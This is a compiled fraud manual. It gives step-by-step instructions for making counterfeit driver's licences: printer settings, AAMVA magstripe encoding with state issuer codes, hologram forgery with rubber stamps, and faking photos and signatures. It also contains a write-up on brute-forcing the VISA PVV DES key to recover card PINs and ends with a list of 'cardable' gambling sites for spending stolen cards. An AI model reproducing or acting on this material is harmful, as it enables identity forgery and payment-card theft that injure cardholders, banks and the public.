+* Turn Digital Camera Correction off +Epson C82 - Laser Teslin - Back (Assuming the back is only black, if not use the front settings): +* Choose Matte Paper - Heavyweight +* Choose Best Photo +* Check Black Ink Only +* Uncheck Edge Smoothing +Printing the Front +After you've adjusted the settings to your liking, it's time to finish up and print the front. You should still +have the Print window open, but if not go back to Print under the File menu. Now all that is left to do is +click OK. Just sit back and wait because it will take a few minutes. After it's done printing, let it dry for a +couple of minutes before you touch it. You wouldn't want to smear the ink on that great looking novelty +you just printed, would you? +Printing the Back +Now it's time to do the back. The procedure is nearly the same as printing the front. The only differences +are where you place the back temp layer on the 8up temp to print, the side of the Teslin you print on, and +(if you are using single sided Teslin) the print settings that you use. +Follow the steps in this guide the same way you did for the front, until the part about placing the layer on +the 8up temp to print. You will want to put the back temp in the rectangle that was to the right or left of +the rectangle you printed the front temp from. For example, you printed the front temp by placing it in the +top left rectangle on the 8up temp. In this case, you'll want to put the back temp in the top right rectangle. +You will need to flip over the Teslin so that the back will print on the opposite side of the front. Use your +common sense, and think about how the printer feeds the paper through. +Adjust the print settings if you are using single sided Teslin, or for double sided, check to make sure they +are still the same. Now you are ready to print it. +If you did everything right, you should end up with a front and back that look great and are aligned +perfectly (or at least very close +The following information was borrowed from an article written by The Jerm +This is a basic guide to encoding the magstripe on driver licenses/ID’s. First, you need to have an +MSR206 magstripe encoder. If you don't have one already you can find them easily through an internet +search or eBay. It'll run you about $600. Okay, now you need some software. You can download my +program for free at http://thejerm.0catch.com. I won't cover how to use the software here. It's pretty self- +explanatory but if you run into any problems just read the readme.txt file that comes with it. +Driver License/ID Encoding +If you want to encode an ID there are two ways to go about it: +1. You can read the magstripe from a real ID and then manually edit the tracks. Here's an example of +track 1 from an Arizona license: +AZPHOENIX^ADAMS$JOHN$QUINCY^1433 N ELM ST$APT 3^ + +Now, if your name is Joe Blow and you live at 123 Fake St. in Tuscon you could easily change it to: +AZTUCSON^BLOW$JOE^123 FAKE ST^ +If you just want to change the birth date it can be found at the end of track 2 in this format: +YYYYMMDD. Most states follow the AAMVA standard pretty closely. The AAMVA standards +document can be downloaded here: +http://aamva.com/Documents/stdAAMVAD...ecs_092003.pdf +2. You can use the built-in ID tracks generator in my program. Unfortunately for most of you I’ve only +included the formats for CA and AZ. If you want to do a little work you can create a script for your own +state’s format. The instructions for doing that are in the readme.txt file that comes with the program. I’d +recommend copying the AZ script and editing it rather than starting from scratch. +AAMVA Format +Here’s a rundown of the AAMVA format with each part color coded for easy reference: +Sample: +AZPHOENIX^ADAMS$JOHN$QUINCY^1433 N ELM ST$APT 3^ +6360260401234567=380719800711= +!!85023 D M601185BRNGRN +Track 1: +AZPHOENIX^ADAMS$JOHN$QUINCY^1433 N ELM ST$APT 3^ +AZ – State Abbreviation. Fixed length of 2 characters. +PHOENIX – City. Maximum length is 13 characters. If city is less than 13 characters it must be followed +by ^ field separator. If city is more than 13 characters it is truncated to 13. No ^ needed if city is 13 +characters long. Examples: +PHOENIX^ +SANTA BARBARA +SAN LUIS OBIS (San Luis Obispo) +ADAMS$JOHN$QUINCY – Name. Maximum length is 35 characters. If less than 35, must be followed +by ^ field separator. Each name is separated by $. Format is LAST$FIRST$MIDDLE or LAST$FIRST if +no middle name is used. +1433 N ELM ST$APT 3 – Address. Maximum length is 77 minus the total number of characters of City + +Name fields. $ is used to separate address lines. If address is less than 29 characters it must be followed +by ^ field separator. +Track 2: +6360260401234567=380719800711= +636026 – Issuer Identification Number (IIN). Every state has a unique IIN. IIN is 6 digits long and starts +with 636. A list of some of the IIN’s is included at the end of this guide. +0401234567 – License/ID Number. Maximum length is 13 characters. If number is longer than 13 +characters, extra characters are placed at end of track. If license/ID number contains letters, they are +converted to 2-digit number (A=01, Z=26). For example, the sample number I used was D01234567 but +got converted to 0401234567. License/ID number must always be followed by = field separator +regardless of length. +3807 – Expiration Date. Format is YYMM so this example expires in July of 2038 (AZ licenses expire on +65th birthday). Some states may use special codes in place of the expiration month. Codes are as follows: +If MM=77 then license is non-expiring. +If MM=88 the expiration date is after the last day of birth month one year from the month (MM) of birth +date and the year (YY) of expiration date. +If MM=99 then the expiration date is on the month (MM) and day (DD) of birth date and the year (YY) +of expiration date. +19800711 – Birth Date. Format is YYYYMMDD so this example is July 11, 1980. += – License/ID Number Overflow. If License/ID number is longer than 13 characters extra characters go +here, otherwise a = field separator is placed here. +Track 3: +!!85023 D M601185BRNGRN +!! – Unknown. These two characters don’t seem to conform to the AAMVA standard and the standards +document contradicts itself. It’s probably safe to copy whatever’s in this spot on a real ID. +85023 - Zip Code. Fixed length of 11 characters. If Zip Code is less than 13 characters add spaces to +make it 13. + +D - Class. Fixed length of 2 characters. If only 1 character add space. +(10 spaces) – Restrictions. Fixed length of 10 characters. If not present fill with spaces. +(4 spaces) – Endorsements. Fixed length of 4 characters. If not present fill with spaces. +M – Sex. Fixed length of 1 character. M for male, F for female. +601 – Height. Fixed length of 3 characters. Feet and inches. Sample is 6’1”. +185 – Weight. Fixed length of 3 characters. Weight is in pounds. If less than 100 lbs. use 0 for first +character. +BRN – Hair Color. Fixed length of 3 characters. Examples are BRN, BLN, RED, BLK. +GRN – Eye Color. Fixed length of 3 characters. Examples are GRN, BLU, HZL, BRN. +There may also be some discretionary data unique to each state at the end of track 3. One more thing, +make sure you set the track format to AAMVA under Card Types on the Settings tab or you may get an +error when you try to write to a card. +Issuer Identification Numbers +Alabama 636033 Louisiana 636007 Nova Scotia 636013 +Arizona 636026 Maine 636041 Ohio 636023 +Arkansas 636021 Maryland 636003 Oklahoma 636058 +British Columbia 636028 Massachusetts 636002 Ontario 636012 +California 636014 Michigan 636032 Oregon 636029 +Colorado 636020 Minnesota 636038 Pennsylvania 636025 +Connecticut 636006 Mississippi 636051 Rhode Island 636052 +District of Columbia 636043 Missouri 636030 Saskatchewan 636044 +Delaware 636011 Montana 636008 South Carolina 636005 +Florida 636010 Nebraska 636054 South Dakota 636042 +Georgia 636055 Nevada 636049 Tennessee 636053 +Guam 636019 New Brunswick 636017 US State Dept 636027 +Hawaii 636047 New Hampshire 636039 Texas 636015 +Idaho 636050 New Jersey 636036 Utah 636040 +Illinois 636035 New Mexico 636009 Vermont 636024 +Indiana 636037 New York 636001 Virginia 636000 +Iowa 636018 Newfoundland 636016 Washington 636045 +Kansas 636022 North Carolina 636004 Wisconsin 636031 +Kentucky 636046 North Dakota 636034 +That’s about it. Good luck! +I realize this guide is getting a bit long but we’re almost done. +The holograms in my opinion are the worst part of the entire process, it may just be me but I am not a big +fan of this, for others, it’s the exact opposite, but I will still give you the information. There is more than +one method to making holograms, and for the sake of time will not go over them all, maybe in the future I +will make another guide including them all, but for right now I will just cover one of them. +Many of you may know what method I will be telling you about, and your sitting there thinking PhotoEZ, +well your wrong, I don’t like it, in fact, I hate it, instead I am going to tell you about an easier, cheaper +way to make your holograms and here it is. +Reffered to as the rubber stamp method The main reason people rule out rubber stamps in this business +anymore, is because they think that the only stamps that can be made are the ones you buy at office +stores, and only contain letters, numbers, etc. However- in most medium sized cities, there are stamp +shops that are able to produce VERY high-quality, detailed stamps, for around 10-20$ The best way to +get your CUSTOMIZED stamp made is to print out the hologram you wish to be made, with the exact +sizes. Keep in mind how you will be placing the stamp on your medium of choice, be it teslin, lamination, +overlam, or whatever. When you print your hologram image out- be sure its not backwards- and tell the +stamp producers this too, so when you stamp your teslin, overlam, lam...etc... it shows up facing you, and +not like a normal stamp, that would need to be facing the opposite direction on the actual stamp. lol, i + +hope this part hasn't confused you- because the first couple of times i had stamps made i had to keep +making sure it would come out right before i took it in. I suggest you give the stamp producers an +example of how you want it done, on your medium of choice so it comes out right, and not in the opposite +direction. To find the stamp producers that can take in scanned images (your printed out hologram) and +make stamps out of them- just look in your yellow pages under "Rubber stamps" and call them to make +sure they can do this process before you go. +Ok, so that was the easy, no talent method for getting great quality rubber stamps. If you are really good +w/ art type stuff- and want a semi-hard challenge, goto the art department at your school and kindly ask +the teacher if they had some linoleum-print blocks that you could borrow for a project- along with the +proper chizling tools to cut out the stamp. Getting these items assumes that you are in highschool, and +you have an art dept. w/ these supplies. If not- you could probably just goto an art store and look for the +supplies yourself. (as mentioned above- you need a Special chizzle for linoleum block carving, and the +linoleum block itself) although I've never needed to do this before- because I'm still in school Now, with +your hologram image that you need to print out from your computer- cut out the parts of it that are +colored in with an exacto knife, and leave the white parts solid. You now have a stencil, basically. Draw +this onto the linoleum block, and make sure things look good...you may have to do some of the drawing +without the stencil in the smaller areas, but its not too difficult once you get the hang of it. After this, +carve out the areas on the block where there was white on the original printout. I suggest using a small +tool for this- so its easier to get into the little nooks and crannies of the holo. When you get the basic +outline of everything around your holo, you now need to put a pvc id, or credit card size object over the +holo and place it exactly where the holo should be on the id, when you make it. Carve this blank area out, +being sure not to cut into the actual hologram, and after this part is done, you're ready to put the +interference gold ink on (i suggest pearl-ex + boss gloss embossing gel- for stamps) and do this by mixing +the two things together, putting it all on the cardboard back of a notbook, making sure it gets well "inked" +then placing your lam, overlam, teslin's inside over it- so it can be stamped, and then its ready to go. Take +note- this second method pretty much only works on the NJ holo- as its the easiest, least complex holo out +there, however you can also make your own "offical-looking" stamps with this method too. +The easiest method by far for using stamps is to simply have one made at an stamp shop that can make +them from scanned images. If you arent very fammiliar with art shit or linoleum block printing I would'nt +attempt the second method. I only included it because i was bored one day during art, and decided to +"take" a linoleum block and the chizzels, and make myself an NJ holo. All in all, i prefer this method over +PhotoEZ, because they come out High-quality and all i have to do is press down the rubber/linolem stamp +on the "ink slab" (back of notebook) and then apply it to the lam, teslin or overlam. I hope you'll at least +try the first method, as I'm sure you'll find that the results kick ass. +I realize this guide got quite long and I apologize but I hoped you enjoyed reading it as much as I enjoyed +writing it. I want to thank everyone who either helped with this text, or created the different methods +explained throughout the article. +Once again be responsible with the information held out in front of you. +I wish you luck with whatever the future may hold for you. +Breaking VISA PIN +Have you ever wonder what would happen if you loose your credit or debit card and someone finds it. +Would this person be able to withdraw cash from an ATM guessing, somehow, your PIN? Moreover, if +you were who finds someone's card would you try to guess the PIN and take the chance to get some easy +money? Of course the answer to both questions should be "no". This work does not deal with the second +question, it is a matter of personal ethics. Herewith I try to answer the first question. +All the information used for this work is public and can be freely found in Internet. The rest is a matter of + +mathematics and programming, thus we can learn something and have some fun. I reveal no secrets. +Furthermore, the aim (and final conclusion) of this work is to demonstrate that PIN algorithms are still +strong enough to provide sufficient security. We all know technology is not the weak point. +This work analyzes one of the most common PIN algorithms, VISA PVV, used by many ATM cards +(credit and debit cards) and tries to find out how resistant is to PIN guessing attacks. By "guessing" I do +not mean choosing a random PIN and trying it in an ATM. It is well known that generally we are given +three consecutive trials to enter the right PIN, if we fail ATM keeps the card. As VISA PIN is four digit +long it's easy to deduce that the chance for a random PIN guessing is 3/10000 = 0.0003, it seems low +enough to be safe; it means you need to loose your card more than three thousand times (or loosing more +than three thousand cards at the same time until there is a reasonable chance of loosing money. +What I really meant by "guessing" was breaking the PIN algorithm so that given any card you can +immediately know the associated PIN. Therefore this document studies that possibility, analyzing the +algorithm and proposing a method for the attack. Finally we give a tool which implements the attack and +present results about the estimated chance to break the system. Note that as long as other banking security +related algorithms (other PIN formats such as IBM PIN or card validation signatures such as CVV or +CVC) are similar to VISA PIN, the same analysis can be done yielding nearly the same results and +conclusions. +VISA PVV algorithm +One of the most common PIN algorithms is the VISA PIN Verification Value (PVV). The customer is +given a PIN and a magnetic stripe card. Encoded in the magnetic stripe is a four digit number, called +PVV. This number is a cryptographic signature of the PIN and other data related to the card. When a user +enters his/her PIN the ATM reads the magnetic stripe, encrypts and sends all this information to a central +computer. There a trial PVV is computed using the customer entered PIN and the card information with a +cryptographic algorithm. The trial PVV is compared with the PVV stored in the card, if they match the +central computer returns to the ATM authorization for the transaction. See in more detail. +The description of the PVV algorithm can be found in two documents linked in the previous page. In +summary it consists in the encryption of a 8 byte (64 bit) string of data, called Transformed Security +Parameter (TSP), with DES algorithm (DEA) in Electronic Code Book mode (ECB) using a secret 64 bit +key. The PVV is derived from the output of the encryption process, which is a 8 byte string. The four +digits of the PVV (from left to right) correspond to the first four decimal digits (from left to right) of the +output from DES when considered as a 16 hexadecimal character (16 x 4 bit = 64 bit) string. If there are +no four decimal digits among the 16 hexadecimal characters then the PVV is completed taken (from left +to right) non decimal characters and decimalizing them by using the conversion A->0, B->1, C->2, D->3, +E->4, F->5. Here is an example: +Output from DES: 0FAB9CDEFFE7DCBA +PVV: 0975 +The strategy of avoiding decimalization by skipping characters until four decimal digits are found (which +happens to be nearly all the times as we will see below) is very clever because it avoids an important bias +in the distribution of digits which has been proven to be fatal for other systems, although the impact on +this system would be much lower. See also a related problem not applying to VISA PVV. +The TSP, seen as a 16 hexadecimal character (64 bit) string, is formed (from left to right) with the 11 +rightmost digits of the PAN (card number) excluding the last digit (check digit), one digit from 1 to 6 +which selects the secret encrypting key and finally the four digits of the PIN. Here is an example: +PAN: 1234 5678 9012 3445 +Key selector: 1 +PIN: 2468 +TSP: 5678901234412468 + +Obviously the problem of breaking VISA PIN consists in finding the secret encrypting key for DES. The +method for that is to do a brute force search of the key space. Note that this is not the only method, one +could try to find a weakness in DEA, many tried, but this old standard is still in wide use (now been +replaced by AES and RSA, though). This demonstrates it is robust enough so that brute force is the only +viable method (there are some better attacks but not practical in our case, for a summary see LASEC +memo and for the dirty details see Biham & Shamir 1990, Biham & Shamir 1991, Matsui 1993, Biham & +Biryukov 1994 and Heys 2001). +The key selector digit was very likely introduced to cover the possibility of a key compromise. In that +case they just have to issue new cards using another key selector. Older cards can be substituted with new +ones or simply the ATM can transparently write a new PVV (corresponding to the new key and keeping +the same PIN) next time the customer uses his/her card. For the shake of security all users should be +asked to change their PINs, however it would be embarrassing for the bank to explain the reason, so very +likely they would not make such request. +Preparing the attack +A brute force attack consists in encrypting a TSP with known PVV using all possible encrypting keys and +compare each obtained PVV with the known PVV. When a match is found we have a candidate key. But +how many keys we have to try? As we said above the key is 64 bit long, this would mean we have to try +2^64 keys. However this is not true. Actually only 56 bits are effective in DES keys because one bit (the +least significant) out of each octet was historically reserved as a checksum for the others; in practice those +8 bits (one for each of the 8 octets) are ignored. +Therefore the DES key space consists of 2^56 keys. If we try all these keys will we find one and only one +match, corresponding to the bank secret key? Certainly not. We will obtain many matching keys. This is +because the PVV is only a small part (one fourth) of the DES output. Furthermore the PVV is +degenerated because some of the digits (those between 0 and 5 after the last, seen from left to right, digit +between 6 and 9) may come from a decimal digit or from a decimalized hexadecimal digit of the DES +output. Thus many keys will produce a DES output which yields to the same matching PVV. +Then what can we do to find the real key among those other false positive keys? Simply we have to +encrypt a second different TSP, also with known PVV, but using only the candidate keys which gave a +positive matching with the first TSP-PVV pair. However there is no guarantee we won't get again many +false positives along with the true key. If so, we will need a third TSP-PVV pair, repeat the process and +so on. +Before we start our attack we have to know how many TSP-PVV pairs we will need. For that we have to +calculate the probability for a random DES output to yield a matching PVV just by chance. There are +several ways to calculate this number and here I will use a simple approach easy to understand but which +requires some background in mathematics of probability. +A probability can always be seen as the ratio of favorable cases to possible cases. In our problem the +number of possible cases is given by the permutation of 16 elements (the 0 to F hexadecimal digits) in a +group of 16 of them (the 16 hexadecimal digits of the DES output). This is given by 16^16 ~ 1.8 * 10^19 +which of course coincides with 2^64 (different numbers of 64 bits). This set of numbers can be separated +into five categories: +1. Those with at least four decimal digits (0 to 9) among the 16 hexadecimal digits (0 to F) of the DES +output. +2. Those with exactly only three decimal digits. +3. Those with exactly only two decimal digits. +4. Those with exactly only one decimal digit. +5. Those with no decimal digits (all between A and F). +Let's calculate how many numbers fall in each category. If we label the 16 hexadecimal digits of the DES + +output as X1 to X16 then we can label the first four decimal digits of any given number of the first +category as Xi, Xj, Xk and Xl. The number of different combinations with this profile is given by the +product 6 i-1 * 10 * 6j-i-1 * 10 * 6k-j-1 * 10 * 6 l-k-1 * 10 * 1616-l where the 6's come from the number +of possibilities for an A to F digit, the 10's come from the possibilities for a 0 to 9 digit, and the 16 comes +from the possibilities for a 0 to F digit. Now the total numbers in the first category is simply given by the +summation of this product over i, j, k, l from 1 to 16 but with i < j < k < l. If you do some math work you +will see this equals to the product of 104/6 with the summation over i from 4 to 16 of (i-1) * (i-2) * (i-3) * +6i-4 * 16 16-i ~ 1.8 * 1019. +Analogously the number of cases in the second category is given by the summation over i, j, k from 1 to +16 with i < j < k of the product 6i-1 * 10 * 6j-i-1 * 10 * 6k-j-1 * 10 * 616-k which you can work it out to +be 16!/(3! * (16-13)!) * 103 * 6 13 = 16 * 15 * 14/(3 * 2) * 103 * 613 = 56 * 104 * 613 ~ 7.3 * 1015. +Similarly for the third category we have the summation over i, j from 1 to 16 with i < j of 6 i-1 * 10 * 6j- +i-1 * 10 * 616-j which equals to 16!/(2! * (16-14)!) * 102 * 614 = 2 * 103 * 615 ~ 9.4 * 1014. Again, for +the fourth category we have the summation over i from 1 to 16 of 6i-1 * 10 * 616-i = 160 * 615 ~ 7.5 * +1013. And finally the amount of cases in the fifth category is given by the permutation of six elements (A +to F digits) in a group of 16, that is, 616 ~ 2.8 * 1012. +I hope you followed the calculations up to this point, the hard part is done. Now as a proof that everything +is right you can sum the number of cases in the 5 categories and see it equals the total number of possible +cases we calculated before. Do the operations using 64 bit numbers or rounding (for floats) or overflow +(for integers) errors won't let you get the exact result. +Up to now we have calculated the number of possible cases in each of the five categories, but we are +interested in obtaining the number of favorable cases instead. It is very easy to derive the latter from the +former as this is just fixing the combination of the four decimal digits (or the required hexadecimal digits +if there are no four decimal digits) of the PVV instead of letting them free. In practice this means turning +the 10's in the formula above into 1's and the required amount of 6's into 1's if there are no four decimal +digits. That is, we have to divide the first result by 104, the second one by 103 * 6, the third one by 102 * +62 , the fourth one by 10 * 63 and the fifth one by 64 . Then the number of favorable cases in the five +categories are approximately 1.8 * 1015, 1.2 * 1012, 2.6 * 1011 , 3.5 * 1010, 2.2 * 109 respectively. +Now we are able to obtain what is the probability for a DES output to match a PVV by chance. We just +have to add the five numbers of favorable cases and divide it by the total number of possible cases. Doing +this we obtain that the probability is very approximately 0.0001 or one out of ten thousand. Is it strange +this well rounded result? Not at all, just have a look at the numbers we calculated above. The first +category dominates by several orders of magnitude the number of favorable and possible cases. This is +rather intuitive as it seems clear that it is very unlikely not having four decimal digits (10 chances out of +16 per digit) among 16 hexadecimal digits. We saw previously that the relationship between the number +of possible and favorable cases in the first category was a division by 10^4, that's where our result p = +0.0001 comes from. +Our aim for all these calculations was to find out how many TSP-PVV pairs we need to carry a successful +brute force attack. Now we are able to calculate the expected number of false positives in a first search: it +will be the number of trials times the probability for a single random false positive, i.e. t * p where t = +2^56, the size of the key space. This amounts to approximately 7.2 * 10^12, a rather big number. The +expected number of false positives in the second search (restricted to the positive keys found in the first +search) will be (t * p) * p, for a third search will be ((t * p) * p) * p and so on. Thus for n searches the +expected number of false positives will be t * p^n. +We can obtain the number of searches required to expect just one false positive by expressing the +equation t * p^n = 1 and solving for n. So n equals to the logarithm in base p of 1/t, which by properties +of logarithms it yields n = log(1/t)/log(p) ~ 4.2. Since we cannot do a fractional search it is convenient to +round up this number. Therefore what is the expected number of false positives if we perform five +searches? It is t * p^5 ~ 0.0007 or approximately 1 out of 1400. Thus using five TSP-PVV pairs is safe to +obtain the true secret key with no false positives. + +The attack +Once we know we need five TSP-PVV pairs, how do we get them? Of course we need at least one card +with known PIN, and due to the nature of the PVV algorithm, that's the only thing we need. With other +PIN systems, such as IBM, we would need five cards, however this is not necessary with VISA PVV +algorithm. We just have to read the magnetic stripe and then change the PIN four times but reading the +card after each change. +It is necessary to read the magnetic stripe of the card to get the PVV and the encrypting key selector. You +can buy a commercial magnetic stripe reader or make one yourself following the instructions you can find +in the previous page and links therein. Once you have a reader see this description of standard magnetic +tracks to find out how to get the PVV from the data read. In that document the PVV field in tracks 1 and 2 +is said to be five character long, but actually the true PVV consists of the last four digits. The first of the +five digits is the key selector. I have only seen cards with a value of 1 in this digit, which is consistent +with the standard and with the secret key never being compromised (and therefore they did not need to +move to another key changing the selector). +I did a simple C program, getpvvkey.c, to perform the attack. It consists of a loop to try all possible keys +to encrypt the first TSP, if the derived PVV matches the true PVV a new TSP is tried, and so on until +there is a mismatch, in which case the key is discarded and a new one is tried, or the five derived PVVs +match the corresponding true PVVs, in which case we can assume we got the bank secret key, however +the loop goes on until it exhausts the key space. This is done to assure we find the true key because there +is a chance (although very low) the first key found is a false positive. +It is expected the program would take a very long time to finish and to minimize the risks of a power cut, +computer hang out, etc. it does checkpoints into the file getpvvkey.dat from time to time (the exact time +depends on the speed of the computer, it's around one hour for the fastest computers now in use). For the +same reason if a positive key is found it is written on the file getpvvkey.key. The program only displays +one message at the beginning, the starting position taken from the checkpoint file if any, after that nothing +more is displayed. +The DES algorithm is a key point in the program, it is therefore very important to optimize its speed. I +tested several implementations: libdes, SSLeay, openssl, cryptlib, nss, libgcrypt, catacomb, libtomcrypt, +cryptopp, ufc-crypt. The DES functions of the first four are based on the same code by Eric Young and is +the one which performed best (includes optimized C and x86 assembler code). Thus I chose libdes which +was the original implementation and condensed all relevant code in the files encrypt.c (C version) and +x86encrypt.s (x86 assembler version). The code is slightly modified to achieve some enhancements in a +brute force attack: the initial permutation is a fixed common steep in each TSP encryption and therefore +can be made just one time at the beginning. Another improvement is that I wrote a completely new setkey +function (I called it nextkey) which is optimum for a brute force loop. +To get the program working you just have to type in the corresponding place five TSPs and their PVVs +and then compile it. I have tested it only in UNIX platforms, using the makefile Makegetpvvkey to +compile (use the command "make -f Makegetpvvkey"). It may compile on other systems but you may +need to fix some things. Be sure that the definition of the type long64 corresponds to a 64 bit integer. In +principle there is no dependence on the endianness of the processor. I have successfully compiled and run +it on Pentium-Linux, Alpha-Tru64, Mips-Irix and Sparc-Solaris. If you do not have and do not want to +install Linux (you don't know what you are missing ;-) you still have the choice to run Linux on CD and +use my program, see my page running Linux without installing it. +Once you have found the secret bank key if you want to find the PIN of an arbitrary card you just have to +write a similar program (sorry I have not written it, I'm too lazy that would try all 10^4 PINs by +generating the corresponding TSP, encrypting it with the (no longer) secret key, deriving the PVV and +comparing it with the PVV in the magnetic stripe of the card. You will get one match for the true PIN. +Only one match? Remember what we saw above, we have a chance of 0.0001 that a random encryption +matches the PVV. We are trying 10000 PINs (and therefore TSPs) thus we expect 10000 * 0.0001 = 1 + +false positive on average. +This is a very interesting result, it means that, on average, each card has two valid PINs: the customer PIN +and the expected false positive. I call it "false" but note that as long as it generates the true PVV it is a +PIN as valid as the customer's one. Furthermore, there is no way to know which is which, even for the +ATM; only customer knows. Even if the false positive were not valid as PIN, you still have three trials at +the ATM anyway, enough on average. Therefore the probability we calculated at the beginning of this +document about random guessing of the PIN has to be corrected. Actually it is twice that value, i.e., it is +0.0006 or one out of more than 1600, still safely low. +Results +It is important to optimize the compilation of the program and to run it in the fastest possible processor +due to the long expected run time. I found that the compiler optimization flag -O gets the better +performance, thought some improvement is achieved adding the -fomit-frame-pointer flag on Pentium- +Linux, the -spike flag on Alpha-Tru64, the -IPA flag on Mips-Irix and the -fast flag on Sparc-Solaris. +Special flags (-DDES_PTR -DDES_RISC1 -DDES_RISC2 -DDES_UNROLL -DASM) for the DES +code have generally benefits as well. All these flags have already been tested and I chose the best +combination for each processor (see makefile) but you can try to fine tune other flags. +According to my tests the best performance is achieved with the AMD Athlon 1600 MHz processor, +exceeding 3.4 million keys per second. Interestingly it gets better results than Intel Pentium IV 1800 MHz +and 2000 MHz (see figures below, click on them to enlarge). I believe this is due to some I/O saturation, +surely cache or memory access, that the AMD processor (which has half the cache of the Pentium) or the +motherboard in which it is running, manages to avoid. In the first figure below you can see that the DES +breaking speed of all processors has more or less a linear relationship with the processor speed, except for +the two Intel Pentium I mentioned before. This is logical, it means that for a double processor speed you'll +get double breaking speed, but watch out for saturation effects, in this case it is better the AMD Athlon +1600 MHz, which will be even cheaper than the Intel Pentium 1800 MHz or 2000 MHz. +In the second figure we can see in more detail what we would call intrinsic DES break power of the +processor. I get this value simply dividing the break speed by the processor speed, that is, we get the +number of DES keys tried per second and per MHz. This is a measure of the performance of the processor +type independently of its speed. The results show that the best processor for this task is the AMD Athlon, +then comes the Alpha and very close after it is the Intel Pentium (except for the higher speed ones which +perform very poor due to the saturation effect). Next is the Mips processor and in the last place is the +Sparc. Some Alpha and Mips processors are located at bottom of scale because they are early releases not +including enhancements of late versions. Note that I included the performance of x86 processors for C +and assembler code as there is a big difference. It seems that gcc is not a good generator of optimized +machine code, but of course we don't know whether a manual optimization of assembler code for the +other processors (Alpha, Mips, Sparc) would boost their results compared to the native C compilers (I did +not use gcc for these other platforms) as it happens with the x86 processor. +The top mark I got running my program was approximately 3 423 922 keys/second using the AMD +processor. So, how much time would need the AMD to break the VISA PIN? It would simply be the ratio +between the size of the key space and the key trying rate, that is, 2^56 keys/3 423 922 keys/second ~ 2.1 * +10^10 seconds ~ 244 thousand days ~ 667 years. This is the time for the program to finish, but on average +the true secret key will be found by half that time. Using commercial cryptographic cards (like the IBM +PCI Cryptographic Coprocessor or the XL-Crypt Encryption Accelerator) does not help very much, they +are, at most, 2 times faster than my top mark, i.e. it would take more than a hundred years to find the key, +at best. Some more speed might be achieved (double, at most) by using a dedicated gigabit VPN box or +similar hardware in a way surely not foreseen by the manufacturer ;-) +Even if you manage to get a hundred newest AMD or Pentium processors working in parallel it would +still take more than 3 years to find the key (if they are provided with crypto-cards the time might be +reduced to less than two years or to less than one year in case of a hundred gigabit VPN boxes). It is clear + +that only expensive dedicated hardware (affordable only by big institutions) or a massive Internet +cooperative attack would success in a reasonable time (both things were already made). These are the +good news. The bad news is that I have deliberately lied a little bit (you may already noticed it): VISA +PVV algorithm allows for the use of triple DES (3-DES) encryption using a 128 bit (only 112 effective) +encrypting key. If 3-DES is indeed in use by the PVV system you can still use the same attack but you +would need four additional TSP-PVV pairs (no problem with that) and it would take more than 3 * 2^56 +times more to find the double length key. Forget it. +PVV algorithm with triple DES consists in the encryption of the TSP with the left half of the encrypting +key, then it decrypts the result with the right half of the key and encrypts the result again with the left half +of the key. Note that if you use a symmetric 128 bit key, that is, the left half equals the right half, you get +a single DES encryption with a single 64 bit key. In this case the algorithm degenerates into the one I +explained above. That's why I did this work, because PVV system is old and maybe when it was +implanted 3-DES was not viable (due to hardware limitations) or it seemed excessive (by that time) to the +people responsible of the implementation, so that it might be possible some banks are using the PVV +algorithm with single DES encryption. +Finally we can conclude that the VISA PVV algorithm as in its general form using 3-DES is rather +secure. It may only be broken using specially designed hardware (implying an enormous inversion and +thus not worth, see Wayner and Wiener) which would exceed the encryption rate of the newest processors +by many orders of magnitude. However the apparently endless exponential growing of the computer +capacities as well as that of the Internet community makes to think that PVV system might be in real +danger within a few years. Of course those banks using PVV with single DES (if any) are already under +true risk of an Internet cooperative attack. You might believe that is something very hard to coordinate, I +mean convincing people, but think about trojan and virus programs and you will see it is not so difficult +to carry on. +Capturing Signatures for ID's +Photo-laminated Ids are done with a specialty Polaroid camera. As this is an older technology, these +cameras turn up quite often on Ebay. The means by which these cameras capture your signature is as +follows: +You sign a piece a paper, and that paper gets put into a slot in the camera. On that paper is all your info, +license number, name, address, everything that is eventually going to be put on the license. Its all bigger +than its going to be on you license too. Id guess the font is about 12 pt type on the paper you sign (it +eventually winds up about 9pt on the license) +So when the agent snaps your pic, they are actually taking your pic and a pic of the card with all your info +on it at the same time. That results in a polaroid pic of your id, which is cut with a die cutter and +laminated. So your signature is actually photographed. +Heres how I get the signature on the ID. +1. Have them sign any piece of white paper. +2. Scan it. I scan at 600dpi, my template is 1200dpi +3. Crop as tight as you can to the actually signature. +4. Convert to greyscale. (remove color information) +5. Convert back to CMYK. +6. Adjust Levels. Make the white totally white with the highlight eyedropper. Use the shadow and + +midtone adjusters to get the signature a little darker (it probably lightened up with ur first adjustment) +7. Copy and paste into your template. +8. Change blending mode for the signature layer to Multiply. This makes all the white area transparent. +9. Line up over sig line and transform to the right size. The tops of the signature letters just about touch +the bottom line of user info. Keep in mind that the person signs on that signature line with all the info +present on the paper, so sometimes the signature will overlap the info, depends how big they sign. Youre +instructed at DMV not to touch the letters and most people manage to stay in the area theyre supposed to. +Even if you dont, they still go ahead, they dont make you sign a new piece of paper. +Thats about it. I usually wind up stretching the sig a little longer too, it should take up at least half the sig +line. +So the signature isnt digital, none of the license is, its a photograph of your actual signature. +Heres the hex of the color I use for the words: 52474F Even though they are black on the white paper, +photographing them changes the colors and they are never dead black on the dl. Blur all the type layers +(except the camera number over ur photo) too with a guassian blur filter. I blur about 2.0 pixels on a +1200dpi temp. Blur the sig to match, usually a little more than the type, like twice. Nothing printed on the +ID is crisp, except for the 3 digit camera number on top of your pic. +The hardest thing I have with NJ is getting the picture to look like a polaroid pic. Taking the pic with a +digital camera creates way too much detail so I always scanned in a passport pic. Still couldnt get it +perfect though. You have to remove all perception of depth, thru blurring, contrast and however else you +can think of. The only way Ive gotten an ID to look exactly like a real one is by scanning in the pic off +someones real ID. My friend got ahold of an old DMV camera, so I dont have to make them on my comp +too much anymore. +Oh another thing, the back of a NJ is actually printed right on the lamination, printing on a piece of paper +never looks right. I have some real laminations so I never had to worry about that. Dont use bright white +paper for the back either. Xerox makes colored paper, use the grey, its perfect and you can buy it at office +max (or office depot, I get em confused) +Cardable Online casinos list Gambling links +10bet.com +24hbet.com +5dimes.com +admiralbet.com +allstar.com +alpenland-online.at +bcsports.net +bet-at-home.com +bet24.com +bet2day.com +bet365.com +bet.betclass.co.uk +commissioncircle.com +betdirect.com +betfairpromo.com +betfred.com + +betinternet.com +betoddoreven.com +betroyal.com +bets4all.com +betsafe.com +betsense.com +dgm2.com +betsson.com +betway.com +betzone.com +bluesq.com +newbodog.com +boylesports.com +betandwin.com +commissionking.com +qksrv.net +cashpoint.at +centrebet.com 